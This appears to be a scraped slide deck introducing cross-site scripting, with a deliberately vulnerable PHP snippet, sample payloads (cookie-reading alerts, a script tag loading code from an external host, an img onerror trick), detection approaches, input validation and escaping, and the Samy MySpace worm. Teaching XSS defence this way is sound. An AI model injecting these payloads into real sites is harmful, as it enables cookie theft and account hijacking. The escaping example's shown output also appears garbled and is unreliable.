![Simple vulnerability
<?php
echo "The value you entered is: " . $_GET['val'];
?>
User: https://example.com/test.php?val=123
Hacker: https://example.com/test.php?val=<script>alert(‘Hacked’)</script>](https://image.slidesharecdn.com/xvqddpyvrxmjtzrsb0fo-signature-1e3daa3c65278befa10fad062b0148d44a91517ecef022145f0a1e4a7140bdc9-poli-170406204800/85/Cross-Site-Scripting-XSS-4-320.jpg)
Cross Site Scripting (XSS)
- 1. XSS Avi Aryan | Saurabh Jain
- 2. Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
- 4. Simple vulnerability <?php echo "The value you entered is: " . $_GET['val']; ?> User: https://example.com/test.php?val=123 Hacker: https://example.com/test.php?val=<script>alert(‘Hacked’)</script>
- 5. <script>alert(document.cookie);</script> Accessing Private Information <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.ex.com/malicious-code.js%3e%3c/script%3e Using External malicious script
- 6. Smarter ways <IMG SRC=jAvascript:alert('test2')> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> Playing with image src Without using javascript or script
- 7. Two Types of XSS Reflected Usually a link with evil code. One who opens the link is affected. Involves error on victim’s side. Stored Vulnerability stored in host’s database. Easy to trap users as no extra step is required. Example - MySpace
- 10. Tech companies spend a part of their capital in detecting security vulnerabilities before anyone else finds them. > Static Detection > Dynamic Detection >> Outsourcing
- 11. Static Detection Analyze codebase for issues either using a machine for known vulnerabilities or manually. Usually requires a dedicated team of professionals.
- 12. Dynamic Detection Test application for known XSS issues by using a tool like Acunetix Web Vulnerability Scanner. Works by injecting payloads into the test application. If payload is saved to database, then application is prone to XSS issues.
- 13. Outsourcing: Cheap way to find security holes Companies hire freelance professionals and pay them only when a vulnerability is found. Cheaper option than maintaining a dedicated team for the same. Due to the high importance of security issues, these professionals are handsomely paid.
- 15. Techniques “Don’t consume data blindly.” > Validate Data > Escape Data > Sanitize Data
- 16. Validating Data Validate data for certain conditions before using it. is_type() // eg is_numeric() regex_match() in_array()
- 17. Escaping Data Modify data to a safer format and then use it. Example filter_var(‘Testing <tags> & chars.’) gives “Testing <tags> & chars.”
- 18. Sanitizing Data Trim harmful snippets from data and then use it. Example filter_var(‘Testing <tags> & chars.’) gives “Testing & chars.”
- 20. In 2005, Samy, a MySpace user noticed a XSS vulnerability that allowed them to make any user who visited their profile as friend. Now the friend was also infected with the same worm and anyone who visited the friend’s profile also became Samy’s friend. This multifold assault increased his friend count to millions in few hours. As a result, MySpace had to shut down for fixing the issue which later led to loss of user trust and brand value.
- 21. Behind the scenes 1. Samy uses stylesheet to insert JS in his page. 2. The JS utilized a XMLHTTPRequest vulnerability to add anyone who visited Samy’s profile as their friend. 3. The vulnerability allowed him to copy his JS to the visitor’s profile page. 4. So the exploit expanded multifold and he had millions of friends in few hours.
- 22. MySpace was taken down, acquired and after few years, abandoned. THE RESULT
- 24. Questions?
Editor's Notes
- #21: Here speaker talks about the whole accident